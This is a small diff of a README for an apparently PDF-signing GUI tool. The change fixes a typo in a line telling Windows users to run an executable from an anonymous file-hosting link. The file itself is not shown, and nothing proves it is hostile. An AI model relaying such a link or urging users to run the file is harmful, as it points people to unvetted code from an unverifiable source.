megaiashua/Cryptographic-PDF-Signer-GUI/README.md

 # Recommended use for Windows users

-Run the executable file fow Windows in the link below.
+Run the executable file in the link below.

 https://pixeldrain.com/u/pS9DMzx4